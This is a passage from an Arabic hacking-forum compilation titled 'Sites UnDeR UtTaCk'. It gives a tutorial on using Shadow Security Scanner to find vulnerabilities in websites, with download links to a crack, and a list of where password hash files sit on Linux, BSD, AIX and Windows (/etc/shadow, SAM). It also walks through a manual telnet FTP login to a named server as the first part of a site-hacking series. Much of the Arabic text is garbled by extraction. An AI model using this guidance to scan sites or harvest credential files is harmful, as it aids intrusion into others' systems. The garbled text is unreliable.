‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪$$$$$$$$$$$$$$$‬‬
‫ـﺮ‬
‫ـ‬
‫ـﺪ><‬
‫ـ‬‫ـ‬
‫ـ‬
‫ـ><‬‫ـ‬
‫ـ‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟ‬
‫‪$$$$$$$$$$$$$$$‬‬

‫ﻧﺒﺬةﺑﺴﯿﻄﺔ ﻋﻦ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ‪:‬‬


‫ﻗﻊ ﻮﻟﺪﯾﻪﺄﻋﻤﺎ ل‬ ‫ﺘﻮ ﺣﺔ ﻒ ﺎﻟﻤﻮا‬ ‫ﺘﺸﺎ ف ﺎﻟﺜﻐ ﺮا ت ﻮأﯾ ﻀﺎ ﺎﻟﻤﻨﺎﻓﺬ ﺎﻟﻤﻔ‬ ‫ﻫﺬا ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﻫﻮﺄﻛﺜ ﺮ ﺎﻟﺒ ﺮاﻣ ﺞﻓﻌﺎﻟﯿﺔﻓﻲ ﺎﻛ‬
‫ﻗﺎ ت‬‫ﻗﻊ ﻮﻣﻌ ﺮﻓﺔ ﺎﻟﻨﻄﺎ‬‫ﺘﺸﺎ ف ﺎﻟﺜﻐ ﺮا تﻓﻲ ﺎﻟﻤﻮا‬ ‫ﻛﺜﯿ ﺮةﻟﻜﻨﻲﻟﻦﺄﺗﻄ ﺮ قﺈﻻﻟﻌﻤﻠﯿﺔ ﻮا ﺣﺪةﻓﻘﻂ ﻮﻫﻲ ﺷ ﺮ حﻛﯿﻔﯿﺔ ﺎﻛ‬
‫ﻗ ﺖ ﻃﻮﯾ ﻞﻟﻜﻨﻲ ﺳﻮ ف‬ ‫ﻗﯿﺔﻟﻦﺄﺷ ﺮ ﺣﻬﺎﻷﻧﻬﺎ ﺳﻮ فﺗﺄ ﺧﺬ ﻮ‬ ‫ﻗﻊ ﻮﺑﺎﻟﻨﺴﺒﺔﻟﻠﺨﯿﺎرا ت ﺎﻟﺒﺎ‬ ‫ﺘﺨﺪﻣﺔﻟﻬﺬا ﺎﻟﻤﻮ‬ ‫ﺎﻟﻤﺴ‬
‫ﻗﻊ‬‫ﻗﺴﺎم ﻋﺪة ﻮﺳﻮ فﺄﺑﺪﺋﻬﺎﺑﺎﻷﻋﻈﻢ ﻮﻫﻮ ﺷ ﺮ حﻟﻜﯿﻔﯿﺔﺈ ﺧ ﺮاجﺛﻐ ﺮا ت ﺎﻟﻤﻮ‬ ‫ﻗﺴﻢ ﺷ ﺮ ﺣﻲﻟﻬﺬا ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﻷ‬ ‫ﺄ‬
‫ﻗﻊ ﺎﻟﻤﺴﺠ ﻞﺑﻬﺎ ﻮاﻟﻤﺰﯾﺪ ﻣﻦ ﺎﻟﻮﻇﺎﺋ ﻒ‬ ‫ﻮاﻟﻤﻨﺎﻓﺬ ﺎﻟﺨﺎ ﺻﺔﺑﻪ ﻮاﻟﻤﻮا‬

‫ﺄوﻻ‪:‬ﺗﻨﺰﯾ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ ﻮﺗﻨﺼﯿﺐ ﺎﻟﻜ ﺮاك‪Shadow Scan Security‬‬

‫ﻣﺎﻓﯿﻪﺄﺑﺴﻂ ﻣﻨﻪ‬

‫ﺣﻤ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ ﻣﻦ ﻫﺬي ﺎﻟﻮﺻﻠﺔ‬

‫‪http://www.safety-lab.com/SSS.exe‬‬

‫ﺘ ﺤﻤﯿ ﻞ ﺣﻤ ﻞ ﺎﻟﻜ ﺮاك ﻣﻦﻫﻨﺎ‬


‫ﺘﻤ ﻞ ﺎﻟ‬
‫ﻮﺑﻌﺪ ﻣﺎﯾﻜ‬

‫‪http://www .e3sar.net/almodammer/ShadowSecurityScanner5.35.exe‬‬

‫ﺎﻟﻄ ﺮﯾﻘﺔ‪:‬‬
‫========================================‬
‫ﺑﻌﺪﺗ ﺤﻤﯿ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ ﻮﺗﻨﺰﯾﻠﻪ ﻮﻋﻤ ﻞ ‪SetUp‬ﻟﻪ‬
‫ﺘﺢ ﺎﻟﻜ ﺮاك‬ ‫ﺎﻓ‬
‫ﺘﻈﻬ ﺮ ﻫﺬه ﺎﻟﺼﻮرة‪:‬‬ ‫ﻮﺑﻌﺪﺬﻟﻚ ﺳ‬

‫‪١ ٤٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪+++++++++++‬‬
‫ﺘﻢﺗﻨﻔﯿﺬ ﺎﻟﻜ ﺮاك‬‫ٍ[]‪][ ١‬ﺎ ﺿﻐﻂﻟﯿ‬
‫[]‪][ ٢‬ﺑﻌﺪﺈﺗﻤﺎم ﻋﻤﻠﯿﺔ ﺎﻟﻜ ﺮاك ﺎ ﺿﻐﻂ ﻫﻨﺎﻟﻠﺨ ﺮوج‬
‫========================================‬

‫ـ ﺮ ح*****&‬
‫ـ‬
‫ـ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞـ‬
‫ـ‬
‫ـ‬‫&*****ﺷ‬

‫ﺘﻘﺪمﻟﻲﺑﺎﻟﺴﺆا ل‬
‫ﺘﺼﺎر ﻮﻣﻦ ﯾﺼﻌﺐ ﻋﻠﯿﻪ ﺎﻟﻔﻬﻢﺄرﺟﻮﺄن ﯾ‬
‫ﺳﻮ فﺄﺷ ﺮ حﺑﺎ ﺧ‬

‫ﺘ ﺤﻪ ﻣﻦﻗﺎﺋﻤﺔ‬
‫=)ﺑﻌﺪﺗ ﺤﻤﯿ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﻗﻢﺑﻔ‬
‫ﺎﺑﺪأ‪Start‬‬
‫ﻮاﺑ ﺤﺚ ﻋﻨﻪ ﺿﻤﻦ ﺎﻟﺒ ﺮاﻣ ﺞ‬
‫ﺘﺢ‬‫ﺑﻌﺪﺈﯾﺠﺎد ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﻗﻢﺑﻔ‬
‫‪ShadowScanSecurity‬‬
‫ـﺄﺗﻲﻟﻚ ﻫﺬا(=‬ ‫ﻟﯿ‬

‫ﺎﻟﺸﻜ ﻞ‪-١ -‬‬

‫ﺛﻨﺎ ء ﺎﻟ ﻀﻐﻂ ﻋﻠﻰ‪Scanner‬‬


‫ﺄ‬

‫ﺎﻟﺸﻜ ﻞ‪-٢-‬‬

‫‪١ ٤١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻢ ‪ ٤‬ﻮﻟﻜﻦﺗ ﺤﻤ ﻞ ﺎﺳﻤﻚ )وﻻداﻋﻲﻷنﺗﻨﺸﺄ‬ ‫‪=١‬ﺈ ﺿﺎﻓﺔ ﺳﯿﺎﺳﺔ ﺟﺪﯾﺪة ﻮاﻟﻤﻘﺼﻮدﺑﻬﺎﺄﯾﻘﻮﻧﺔﺄ ﺧ ﺮى ﻮﻫﻲ ﺎﻟ ﺮ‬
‫ﺑﺎ ﺣﺚﺄو ﺳﯿﺎﺳﺔ ﺟﺪﯾﺪةﻟﻚ ﯾﻜﻔﯿﻚ ﺎﻟﻤﻮﺟﻮدة(‬
‫ﺘﻐﯿﯿ ﺮ ﺷﻲ ءﺄﺑﺪاﻓﻲﻫﺬا ﺎﻟﺨﯿﺎر‬ ‫‪=٢‬ﺈﻋﺪادا تﻟﻬﺬا ﺎﻟﺒﺎ ﺣﺚ ﻮأﯾ ﻀﺎ ﺎﻧﺎﻻأﻧﺼ ﺤﻚﺑ‬
‫ﻗﻢ ‪ ٤‬ﻮﻟﻜﻦ ﻣﻦﺗﺼﻤﯿﻤﻚ‬ ‫ﺘﻲﺗﺸﺒﻪ ﺮ‬ ‫ﺘﻪ ﻮاﻟﻤﻘﺼﻮد ﺎﻷﯾﻘﻮﻧﺔ ﺎﻟ‬ ‫ﺘﻲ ﺎﻧ ﺖ ﺻﻤﻤ‬‫‪ =٣‬ﺣﺬ ف ﺎﻟﻤﻮﺟﻪ ﺎﻟﺠﺪﯾﺪ ﺎﻟ‬
‫ﻓﺒ ﻀﻐﻄﻚ ﻫﻨﺎ ﺳﻮ فﺗ ﺤﺬﻓﻬﺎ‬
‫‪ =٤‬ﻋﻠﯿﻚﺗﻈﻠﯿﻠﻪ ﻮﻫﻮ ﺎﻟﻤ ﺮﺑﻊ ﺎﻟﺬي ﯾﻮﺟﺪﺑﻪ ﺧﺼﺎﺋ ﺺ ﺎﻟﺒ ﺤﺚ ﻋﻦﻛ ﻞ ﺷﻲ ء‬
‫‪=٥‬ﻟ ﺮﺟﻮ عﻟﻠﺨﻠ ﻒ ﻮﻻأﻇﻦﺄن ﻫﻨﺎك ﺮﺟﻮ عﻷﻧﻬﺎ ﺎﻟﻌﻤﻠﯿﺔ ﻮاﻹ ﻃﺎر ﺎﻻو ل‬
‫ﺘﺎﺑﻌﺔ‬‫‪ =٦‬ﺎ ﺿﻐﻄﻬﺎﺈذاﺄرد ت ﺎﻟﻤ‬
‫‪=٧‬ﺈزاﻟﺔ ﺎﻹ ﻃﺎر‬

‫ﺎﻟﺸﻜ ﻞ‪-٣-‬‬

‫)‪ (١‬ﻟﻠ ﺮﺟﻮ عﺈﻟﻰ ﺎﻟﺸﻜ ﻞ‪-٢-‬‬


‫ﺘﺎﻟﯿﺔ‬
‫)‪ (٢‬اﻟﺬﻫﺎبﺈﻟﻰ ﺎﻟﻌﻤﻠﯿﺔ ﺎﻟ‬
‫)‪(٣‬ﺈﻟﻐﺎ ءﺈﻛﻤﺎ ل ﺎﻟﻌﻤﻠﯿﺔ‬

‫ﺎﻟﺸﻜ ﻞ‪-٤-‬‬

‫‪١ ٤٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊﻟﻠﺒ ﺤﺚﻓﯿﻪ‬ ‫‪+ ١+‬إ ﺿﺎﻓﺔ ﻣﻮ‬


‫‪+ ٢+‬إ ﺿﺎﻓﺔﺄيﺑﻲ ﻣﻦ ﻮإﻟﻰ‬
‫ﻗﻊﺗ ﺮﯾﺪ ﺎﻟﺒ ﺤﺚ ﻋﻨﻬﺎ ﺎوﺂيﺑﯿﺎ ت‬ ‫ﺘﻮي ﻋﻠﻰ ﻣﻮا‬ ‫‪+ ٣+‬ﺗ ﺤﻤﯿ ﻞ ﻣﻦ ﻣﻠ ﻒ ﺳﻮا ءﻛﺎن ﯾ ﺤ‬
‫ﺛﻨﺎ ء ﺎﻟ ﻀﻐﻂ ﻫﻨﺎ ﺳﻮ ف ﯾﻨ ﺤﺬ ف‬‫ﻗﻊ ﻮﺑﻌﺪﺗ ﺤﺪﯾﺪهﺄ‬ ‫‪ + ٤+‬ﻋﻨﺪﺈ ﺿﺎﻓﺔ ﻣﻮ‬
‫‪ + ٥+‬ﺎﻟﻌﻮدة ﻮاﻟ ﺮﺟﻮ عﺈﻟﻰ ﺎﻟﺨﻠ ﻒﺄي ‪:‬ﺎﻟﺸﻜ ﻞ‪-٣-‬‬
‫‪+ ٦+‬ﺈﺗﻤﺎم ﺎﻟﻌﻤﻠﯿﺔ‬
‫ﻗﻲ ﺎﻷزرار ﺎﻟﺴﺎﺑﻘﺔﻓﻲ ﺎﻷﺷﻜﺎ ل ﺎﻟﺴﺎﺑﻘﺔ‬‫‪+ ٧+‬ﺈزاﻟﺔ ﻮاﻟﺨ ﺮوج ﻣﻦ ﺎﻹ ﻃﺎرﺈﻟﻰ ﻮاﺟﻪ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ ﺎﻟ ﺮﺋﯿﺴﯿﺔﻛﺒﺎ‬

‫ﺎﻟﺸﻜ ﻞ‪-٥-‬‬

‫ﺛﻨﺎ ء ﺿﻐﻂ ﺎﻟﺰر ‪ Done‬ﻮﻓﻲ ﺎﻟﺨﻄﻮة ﺎﻟﺴﺎﺑﻘﺔ ﺳﻮ ف ﯾﻈﻬ ﺮ ﻫﺬا ﺎﻟﻤ ﺮﺑﻊ ﺎﻟﻜﺒﯿ ﺮ‬ ‫ﺄ‬
‫ﺘﻔﺼﯿ ﻞﺄﻛﺜ ﺮ‬‫ﻮﻣﻦﻫﻨﺎ ﺳﻮ ف ﻧﺒﺪأ ﺎﻟﺒ ﺤﺚ ﻋﻦ ﺎﻟﺜﻐ ﺮا تﺄﻧﻈ ﺮ ﺎﻟﺸﻜ ﻞﻟ‬

‫‪١ ٤٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎﻟﺸﻜ ﻞ‪-٦-‬‬

‫ﻗﻊ ﻮاﻟ ﻀﻐﻆﺑﺰر ﺎﻟﻔﺄرة ﺎﻟﯿﻤﯿﻦ‬


‫ﺘﻈﻠﯿ ﻞ ﺎﻟﻤﻮ‬
‫ﺑﻌﺪ ﺎﻟ ﻀﻐﻂ ﻋﻠﻰ ‪ Start Scan‬ﻮذﻟﻚﺑ‬

‫ﻗﻢ ‪١‬ﻓﻲ ﺎﻟﺸﻜ ﻞ‪-٥-‬‬


‫ﺘﻈ ﺮﻗﻠﯿﻼﺑﻌﺪ ﺿﻐﻄﻚﻟ ﺮ‬
‫ﺎﻧ‬

‫ﻗﺎ تﻛﻤﺎ ﻫﻮ ﻣﻮ ﺿﺢﻓﻲ ﻫﺬا ﺎﻟﺸﻜ ﻞ‬


‫ﻗﻊ ﻮاﻟﻤﻨﺎﻓﺬ ﺎﻟﺨﺎ ﺻﺔﺑﻪ ﻣﻊ ﺎﻟﻨﻄﺎ‬
‫ﻮﺳﻮ ف ﯾﻘﻮم ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﺑﺎﻟﺒ ﺤﺚﻓﻲ ﺎﻟﻤﻮ‬

‫‪...‬‬

‫‪١ ٤٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻣﺎﻛﻦ وﺟﻮد ﻣﻠﻒ اﻟﺒﺎﺳﻮرد ﰲ أﻧﻈﻤﺔ اﻟﺘﺸﻐﯿﻞ "‬

‫‪$$$$$$$$$$$‬‬
‫ﺘﺮ‬
‫اﻟﻜﺎﺗﺐ‪:‬ﺑﻼكﻫﻨ‬
‫‪$$$$$$$$$$$‬‬

‫ﻓﻲ ﻧﻄﻢﻟﯿﻮﻧﻜ ﺲ‬
‫‪/etc/shadow‬‬
‫ﺘﯿﻤﺰ‬ ‫ﻓﻲ ﻧﻈﻢ ﺻﻦ ﻣﯿﻜ ﺮوﺳﯿﺴ‬
‫‪/etc/shadow‬‬
‫ﻓﻲ ﻧﻈﻢا ل ‪BSD‬ﺑﺼﻔﻪ ﻋﺎﻣﻪ‬
‫‪/etc/master.passwd‬‬
‫ﻓﻲ ﻧﻈﻢاﻟﺴﯿﻠﯿﻜﻮن ﺟ ﺮاﻓﯿﻜ ﺲ ‪ SGI‬ﺎﻟﻤﺴﻤﻰ ‪ARIX‬‬
‫‪/etc/shadow‬‬
‫ﻧﻈﺎمايﺑﻲاماﻟﻤﺴﻤﻰ ‪AIX‬‬
‫‪/etc/security/shadow‬‬
‫ﻧﻈﻢ ﯾﻮﻧﻜ ﺲﺑﺼﻔﻪ ﻋﺎﻣﻪ ))اﺗ ﺶﺑﻲ ﯾﻮاﻛ ﺲ ‪)) -‬ﺗ ﺮو ﯾﻮﻧﻜ ﺲ ‪ )) 64‬ﺧﺎ صﺑﺎﻟﻤﻨﻔ ﺮﯾﻢ وﻧﻈﻢاﻟ ﺮﯾﺴﻚ ‪٦٤‬‬
‫ﺘﺠﺎ تاﻻﻟﻔﺎ (( (( ((‬ ‫وﺑﻌ ﺾ ﻣﻨ‬
‫‪/etc/shadow‬‬
‫ﺘﻤﺪﺗﺸﻔﯿ ﺮ ‪ MD5‬ﺎﻟﻘﻮي ((‬ ‫))اﻏﻠﺐ ﻫﺬهاﻻ ﺻﺪارا تﺗﻌ‬
‫ﻧﻈﻢ وﯾﻨﺪوزﺑﺼﻔﻪ ﻋﺎﻣﻪ )) ‪(( 2000 - NT - XP‬‬
‫ﺘﺸﻔﯿ ﺮ )) ‪(( LanMan‬‬ ‫ﺎﻟﻤﻠ ﻒاﻟﻤﻔﻌ ﻞﺑ‬
‫‪/winnt/system32/config/sam‬‬
‫ﺘﻰ وﻟﻮ‬
‫ﺘ ﺤﻪاو ﻧﺴﺨﻪ ﻃﺎﻟﻤﺎاﻟﻨﻈﺎم ﯾﻌﻤ ﻞ ﺣ‬ ‫ﻗﻼ ع ﻣﻦ ﺎﻟﻨﻈﺎم وﻻ ﯾﺴﻤﺢﺑﻔ‬ ‫))ﻫﺬااﻟﻤﻠ ﻒ ﻣﻐﻠ ﻖ ﻋﺎدةاﻻ ﻋﻨﺪاﻻ‬
‫ﺘﻮر ((‬ ‫ﺘ ﺮﯾ‬
‫ﻛﺎنﻟﺪﯾﻚ ﺻﻼ ﺣﯿﺎ ت ﺎﻻدﻣﻨﯿﺴ‬
‫ﺘﯿﺎ ﻃﻲ ((‬‫))اﻟﻤﻠ ﻒاﻻ ﺣ‬
‫_‪/winnt/repair/sam or sam.‬‬
‫ﻓﻲاﻟﻮﯾﻨﺪوزاﻛ ﺲﺑﻲاﻟﺒ ﺮوﻓﯿﺸﯿﻨﺎ ل وا ﺻﺪارا تاﻟﻮﯾﺴﻠ ﺮ )) ﺳﯿ ﺮﻓ ﺮ ‪-‬ادﻓﺎﻧﺴﺪ ﺳﯿ ﺮﻓ ﺮ ((‬
‫ﻟﻦﺗﺠﺪاﻟﻮﯾﻨﺪوزﻓﻲ ﻣﺠﻠﺪ ‪WINNT‬‬
‫ﻮﻟﻜﻦ ﺳﯿﻜﻮنﻛﺎﻟﻮﯾﻨﺪوزاﻟﻌﺎدي‪. Windows‬‬

‫‪١ ٤٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﺧﱰاق اﳌﻮﻗﻊ )اﳉﺰء اﻷول( "‬

‫‪$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﻜﻨﺪور‬
‫‪$$$$$$$$$$‬‬

‫ﻣﻘﺪﻣﻪ ‪:‬‬
‫ﺳﺄﻋﯿﺪﺗﻌ ﺮﯾ ﻒ ‪ Telnet‬ﻣﻦ ﺟﺪﯾﺪ وﻟﻜﻦﺑﻄ ﺮﯾﻘﻪاﻛﺜ ﺮﺑﺴﺎ ﻃﻪ ‪..‬‬
‫ﺘﺨﺪم ﻋﻨﻮاناﻟﺠﻬﺎز‬ ‫ﺘﺼ ﻞ ﯾﺴ‬ ‫ﺘﺨﺪمﻓﻲإﻧﺸﺎ ء و ﺻﻠﻪﺑﯿﻦ ﺟﻬﺎزﯾﻦ ‪،‬واﻟﺠﻬﺎزاﻟﻤ‬ ‫‪Telnet‬ﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﯾﺴ‬
‫ﺘﻬﺪ ف )اﻟﺨﺎدم( ﯾﺸﻐ ﻞﺑ ﺮﻧﺎﻣ ﺞ آ ﺧ ﺮ‬ ‫ﺘﻢاﻻﺗﺼﺎ ل ﻋﻠﯿﻪ ‪،‬واﻟﺠﻬﺎزاﻟﻤﺴ‬ ‫ﻗﻢاﻟﻤﻨﻔﺬ ‪ Port‬ﺎﻟﺬي ﺳﯿ‬ ‫ﺘﻬﺪ ف و ر‬ ‫ﺎﻟﻤﺴ‬
‫ﺘﺨﺪامأ ﺣﺪاﻟﺒ ﺮوﺗﻮﻛﻮﻻ ت ‪.‬‬ ‫ﺘﻘﺒﺎ لﺑﺎﺳ‬
‫ﺘﻢ ﻋﻤﻠﯿﻪاﻹرﺳﺎ ل واﻻﺳ‬ ‫ﺘﻤﻊ ﻋﻠﻰ ﻫﺬااﻟﻤﻨﻔﺬ وﺗ‬ ‫)‪(Daemon‬ﯾﺴ‬
‫ﻗﺎﻣﺔ ﺣﻮار‬ ‫ﺘﺼ ﻞ(ﺗ ﺮﯾﺪإ‬ ‫ﺘﻬﺪ ف( وأﻧ ﺖ )اﻟﻤ‬‫ﺘ ﺮ ضأن ﻫﻨﺎك رﺟ ﻞﻓﻲﻓ ﺮﻧﺴﺎ )اﻟﻤﺴ‬ ‫ﺗﺸﺒﯿﻪ ﻣﻦ ﺣﯿﺎﺗﻨﺎاﻟﻌﻤﻠﯿﺔ ‪ :‬ﻧﻔ‬
‫ﺘﺨﺪام وﺳﯿﻠﻪاﺗﺼﺎ ل )‪ (Telnet‬ﻮﻟﻨﻔ ﺮ ضأﻧﻬﺎاﻟﻬﺎﺗ ﻒ‬ ‫ﻣﻌﻪ )و ﺻﻠﻪ( وأﻧ ﺖﻓﻲ ﻣﺼ ﺮ ‪..‬ﻓﻼﺑﺪﻟﻚ ﻣﻦاﺳ‬
‫ﺘ ﺤﺪ ث‬ ‫اﻟﺬي ﻻﺑﺪﻟﻠ ﺮﺟ ﻞأن ﯾ ﻀﻌﻪ ﻋﻠﻰأذﻧﻪ )‪(Daemon‬ﻟﻜﻲ ﯾﺴﻤﻌﻚ ‪ ..‬وﻟﻨﻔ ﺮ ضأﯾ ﻀﺎأن ﻫﺬااﻟ ﺮﺟ ﻞ ﻻ ﯾ‬
‫ﺘﻘﺒﺎ ل(‬‫ﺘ ﺤﺪ ث )اﻹرﺳﺎ ل ﻮاﻻﺳ‬ ‫ﺘﻰﺗ‬ ‫ﺘﺨﺪم( ﺣ‬ ‫ﺘﺨﺪاماﻟﻔ ﺮﻧﺴﯿﺔ )اﻟﺒ ﺮوﺗﻮﻛﻮ لاﻟﻤﺴ‬ ‫اﻟﻌ ﺮﺑﯿﺔ ‪..‬إذنﻓﻼﺑﺪﻟﻚ ﻣﻦاﺳ‬
‫ﺑ ﺤ ﺮﯾﻪ ‪.‬‬
‫ﺘ ﺞأن ‪Telnet‬ﻫﻮ ﻣﺠ ﺮد و ﺻﻠﻪ )ﻣﺜ ﻞاﻟﻬﺎﺗ ﻒ( ‪ ..‬ﻮاﻧﻪ ﻻﺑﺪﻟﻨﺎ ﻣﻦ ﻣﻌ ﺮﻓﺔاﻟﺒ ﺮوﺗﻮﻛﻮ ل‬ ‫ﺘﻨ‬‫ﻣﻤﺎ ﺳﺒ ﻖ ﻧﺴ‬
‫ﺘﻘﺒﺎ ل ‪.‬ﻛﻤﺎاﻧﻪ ﻻﺑﺪﻟﻨﺎ ﻣﻦأن ﻧﻌ ﺮ فأﯾ ﻀﺎأﻧﻪ ﻻﺑﺪ ﻣﻦ‬ ‫ﺘﻰ ﻧﻨﺠﺢﻓﻲاﻹرﺳﺎ ل و ﺎﻻﺳ‬ ‫ﺘﺨﺪمﻓﻲاﻻﺗﺼﺎ ل ﺣ‬ ‫اﻟﻤﺴ‬
‫ﺘﺴﻤﻊ ﻋﻠﻰ ﺎﻟﻤﻨﻔﺬاﻟﻤ ﺮاداﻻﺗﺼﺎ ل ﻋﻠﯿﻪ ‪.‬‬ ‫ﺑ ﺮﻧﺎﻣ ﺞ ‪ Daemon‬ﯾ‬
‫ﺘﺨﺪام ‪ Telnet‬ﻚ ‪FTP Client‬‬ ‫ﺎﺳ‬
‫ﺘﺨﺪاﻣﻨﺎﺑ ﺮوﺗﻮﻛﻮ ل ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت ‪FileTransfer Protocol‬‬ ‫ﺘﻢاﻻﺗﺼﺎ ل ﻋﻠﯿﻪﻓﻲ ﺣﺎﻟﻪاﺳ‬ ‫ﺎﻟﻤﻨﻔﺬاﻟﺬي ﺳﯿ‬
‫ﻓﻲاﻟﻐﺎﻟﺐ ﺳﯿﻜﻮن ‪.. ٢١‬‬
‫ﺄﯾﻦاﻟﺼﻌﻮﺑﺔإذن ؟‬
‫ـ ‪ FTP Client‬ﯾﺠﺐ ﻋﻠﯿﻨﺎاﻹﻟﻤﺎمﺑﻘﺪرﻛﺒﯿ ﺮﺑﺒ ﺮوﺗﻮﻛﻮ ل‬ ‫ﺘﺨﺪم ‪Telnet‬ﻛ‬ ‫ﺎﻟﺼﻌﻮﺑﺔﺗﻜﻤﻦﻓﻲأﻧﻨﺎﻟﻜﻲ ﻧﺴ‬
‫!! ‪FTP‬‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ﻫﺬااﻟﺒ ﺮوﺗﻮﻛﻮ ل ‪..‬‬‫ﻮﻟﻜﻦ ﻫﺬاﻟﻦ ﯾﻤﻨﻌﻨﻲ ﻣﻦ ﻋ ﺮ ضﺑﻌ ﺾاﻷﻣﺜﻠﺔ ﻹﻇﻬﺎرﻛﯿﻔﯿﺔاﻟ‬
‫ﺑﺪ ءاﻻﺗﺼﺎ ل‬
‫ﺘﺸﻐﯿ ﻞ ‪ Telnet‬ﻮ ﺷﺒﻚ ﻋﻠﻰ ‪ftp.zdnet.com‬ﺑﺎﻟﻤﻨﻔﺬ ‪٢١‬‬ ‫‪-١‬ﻗﻢﺑ‬
‫ﻮ ﻫﺬا ﻣﺎ ﺳﯿﻈﻬ ﺮﻟﻚ‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬
‫‪220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.‬‬
‫ﻗﻊ ‪ zdnet‬ﻮﻫﻲ‬ ‫ﺘﺨﺪمﻓﻲ ﻣﻮ‬ ‫ﻮ ﺎﻟﺴﻄ ﺮاﻟﺴﺎﺑ ﻖ ﯾﺴﻤﻲ ‪ Banner‬ﺎﻟﺨﺎ صﺑﺎ ل ‪ FTP Daemon‬ﺎﻟﻤﺴ‬
‫ﻗﻢاﻟﻤﻮﺟﻮدﻓﻲاﻟﺒﺪاﯾﺔ ﯾﺪ ل ﻋﻠﻰ ﻧﺠﺎ ح ﺎﻻﺗﺼﺎ ل و‬ ‫ﺘﺸﺒﯿﻚ ﻋﻠﯿﻪ ‪ .‬واﻟ ﺮ‬‫ﺘﻢاﻟ‬‫ﻗﻊاﻟﺬي ﺳﯿ‬ ‫ﺘﻼ فاﻟﻤﻮ‬ ‫ﺘﻠ ﻒﺑﺎ ﺧ‬ ‫ﺗﺨ‬
‫ﻗﻢﺛﺎﺑ ﺖ ‪.‬‬ ‫ﻫﻮ ر‬
‫ﺘﺨﺪم ‪ Username‬ﻮﻛﻠﻤﺔاﻟﺴ ﺮ ‪Password ..‬ﺑﻤﺎ‬ ‫ﺘﺨﺪاماﺳﻢاﻟﻤﺴ‬ ‫ﺘﺎﻟﯿﺔﻫﻲاﻟﻮﻟﻮجﺑﺎﺳ‬ ‫‪-٢‬اﻟﺨﻄﻮةاﻟ‬
‫ﺘﺎﻟﻲ‪:‬‬‫ﺘﺨﺪاﻣﻪﻓﻲاﻟﻮﻟﻮجﻟﻠﻨﻈﺎمﻛﺎﻟ‬ ‫ﺘﻢ ﺎﺳ‬‫ﺘﺨﺪم ‪ Anonymous‬ﺳﯿ‬ ‫أن ‪zdnet‬ﺗﺪﻋﻢاﻟﻤﺴ‬
‫ﺘﺐ‬ ‫ﺘﻜ‬ ‫ﺳ‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬
‫‪user anonymous‬‬
‫ﺘﺎﻟﻲ‬‫ﺘﺠﯿﺐاﻟﺨﺎدمﺑﺎﻟ‬ ‫ﻮ ﺳﯿﺴ‬

‫‪Sources Code -‬ﺷﻔ ﺮة‬

‫‪١ ٤٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪331 Guest login ok, send your complete e-mail address as password.‬‬
‫ﺘﺎﻟﻲ‬
‫ﺘﺐأﻧ ﺖاﻟ‬ ‫ﺛﻢﺗﻜ‬
‫‪Sources Code -‬ﺷﻔ ﺮة‬
‫‪pass @zorro‬‬
‫ﺘ ﺮوﻧﻲاﻟﺨﺎ صﺑﻚﻛﻜﻠﻤﺔ‬‫ﺘﺨﺪم ‪Anonymous‬ﺗﻘﻮمﺑﺈﻋﻄﺎ ء ﻋﻨﻮاناﻟﺒ ﺮﯾﺪاﻹﻟﻜ‬ ‫ﻮﺑﺎﻟﻄﺒﻊ ﻋﻨﺪاﻟﻮﻟﻮجﺑﺎﻟﻤﺴ‬
‫ﺘﻮي ﻋﻠﻰاﻟ ﺮﻣﺰ @ (‬
‫ﺘﺐأي ﺷﺊ ﯾﺄ ﺧﺬ ﺷﻜ ﻞاﻟﺒ ﺮﯾﺪ )أي ﯾ ﺤ‬
‫اﻟﺴ ﺮ ‪ ..‬وﺈذاﻟﻢﺗ ﺮدإﻋﻄﺎ ءﺑ ﺮﯾﺪكﻓﯿﻤﻜﻨﻚأنﺗﻜ‬
‫ﺘﺎﻟﻲ‬
‫ﺘﺠﯿﺐاﻟﺨﺎدمﺑﺎﻟ‬‫ﻮ ﺳﯿﺴ‬

‫‪Sources Code -‬ﺷﻔ ﺮة‬


‫‪230-You are user #552 of 2000 simultaneous users allowed.‬‬
‫‪230-‬‬
‫‪230 Logged in anonymously.‬‬
